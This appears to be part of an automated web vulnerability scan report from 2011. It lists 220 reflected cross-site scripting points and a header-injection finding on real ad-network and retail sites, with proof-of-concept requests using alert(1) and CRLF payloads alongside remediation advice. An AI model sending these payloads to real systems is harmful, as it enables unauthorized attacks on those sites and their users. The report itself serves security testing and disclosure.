Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:30:01 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.18847
994f5b20968=1; expires=Thu, 30 Jun 2011 11:30:01 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

2.26. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/dotset.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload df68a%0d%0a54803532416 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=2101/df68a%0d%0a54803532416&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:30:09 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.2101/df68a
54803532416=1; expires=Thu, 30 Jun 2011 11:30:09 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

3. Cross-site scripting (reflected) previous next
There are 220 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
http://480-adver-view.c3metrics.com/v.js [cid parameter]
http://480-adver-view.c3metrics.com/v.js [id parameter]
http://480-adver-view.c3metrics.com/v.js [t parameter]
http://a.rfihub.com/sed [pa parameter]
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [sz parameter]
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [sz parameter]
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [site parameter]
http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [site parameter]
http://ad.doubleclick.net/adj/nbcu.cnbc/search [site parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://adnxs.revsci.net/imp [Z parameter]
http://adnxs.revsci.net/imp [s parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ads.pointroll.com/PortalServe/ [dom parameter]
http://ads.pointroll.com/PortalServe/ [flash parameter]
http://ads.pointroll.com/PortalServe/ [redir parameter]
http://ads.pointroll.com/PortalServe/ [time parameter]
http://adsfac.us/ag.asp [cc parameter]
http://api.bizographics.com/v1/profile.json [&callback parameter]
http://api.bizographics.com/v1/profile.json [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://api.cnbc.com/api/movers/movers.asp [chartType parameter]
http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 2]
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 3]
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 4]
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 5]
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 6]
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 7]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]
http://click.linksynergy.com/fs-bin/click [offerid parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 2]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 3]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 4]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 5]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [dom parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [flash parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [name of an arbitrarily supplied request parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pid parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pos parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [r parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [redir parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [time parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 2]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 3]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 4]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 5]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [dom parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [flash parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [name of an arbitrarily supplied request parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pid parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pos parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [r parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [redir parameter]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [time parameter]
http://ib.adnxs.com/ptj [redir parameter]
http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter]
http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter]
http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [placementid parameter]
http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpvc parameter]
http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpck parameter]
http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpt parameter]
http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpvc parameter]
http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpck parameter]
http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpvc parameter]
http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpck parameter]
http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpvc parameter]
http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter]
http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter]
http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter]
http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter]
http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter]
http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter]
http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter]
http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter]
http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter]
http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpck parameter]
http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpvc parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://oc.creditcards.com/trans_node.php [c parameter]
http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter]
http://pixel.adsafeprotected.com/jspix [advId parameter]
http://pixel.adsafeprotected.com/jspix [anId parameter]
http://pixel.adsafeprotected.com/jspix [campId parameter]
http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
http://pixel.adsafeprotected.com/jspix [pubId parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://search.cnbc.com/main.do [keywords parameter]
http://search.cnbc.com/main.do [keywords parameter]
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
http://www.creditcards.com/0-apr-credit-cards.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/instant-approval.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/ ['"--></style></script><script>netsparker(0x000133)</script> parameter]
http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/ [nsextt parameter]
http://www.creditcards.com/oc/ [nsextt parameter]
http://www.creditcards.com/oc/ [pg parameter]
http://www.creditcards.com/oc/ [pg parameter]
http://www.creditcards.com/oc/ [pgpos parameter]
http://www.creditcards.com/oc/ [pgpos parameter]
http://www.creditcards.com/oc/ [pid parameter]
http://www.creditcards.com/oc/ [pid parameter]
http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation [rpp parameter]
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [omni parameter]
http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [Overlay_Type parameter]
http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [basePage parameter]
http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [storeSkuNum parameter]
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService [catEntryId_1 parameter]
http://www.nutter.com/attorneys.php [AttorneyID parameter]
http://www.nutter.com/attorneys.php [AttorneyID parameter]
http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]
http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]
http://www.res-x.com/ws/r2/Resonance.aspx [clk parameter]
http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]
http://adnxs.revsci.net/imp [Referer HTTP header]
http://api.bizographics.com/v1/profile.json [Referer HTTP header]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [Referer HTTP header]
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [Referer HTTP header]
http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie]
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf [meld_sess cookie]
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf [meld_sess cookie]
http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 79ba6<script>alert(1)</script>5514b8ff214 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=48079ba6<script>alert(1)</script>5514b8ff214&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:05:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 48079ba6<script>alert(1)</script>5514b8ff214-SM=adver_06-16-2011-12-05-53; expires=Sun, 19-Jun-2011 12:05:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 48079ba6<script>alert(1)</script>5514b8ff214-VT=adver_06-16-2011-12-05-53_10422815611308225953; expires=Tue, 14-Jun-2016 12:05:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 48079ba6<script>alert(1)</script>5514b8ff214-nUID=adver_10422815611308225953; expires=Thu, 16-Jun-2011 12:20:53 GMT; path=/; domain=c3metrics.com
Content-Length: 6692
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='48079ba6<script>alert(1)</script>5514b8ff214';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='10422815611308225953';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';thi
...[SNIP]...

3.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 1e731<script>alert(1)</script>445a490afc6 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver1e731<script>alert(1)</script>445a490afc6&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:05:47 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:05:47 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-04-42_10523863461308225882ZZZZadver1e731%3Cscript%3Ealert%281%29%3C%2Fscript%3E445a490afc6_06-16-2011-12-05-47_8977705271308225947; expires=Tue, 14-Jun-2016 12:05:47 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10523863461308225882ZZZZadver1e731%3Cscript%3Ealert%281%29%3C%2Fscript%3E445a490afc6_8977705271308225947; expires=Thu, 16-Jun-2011 12:20:47 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
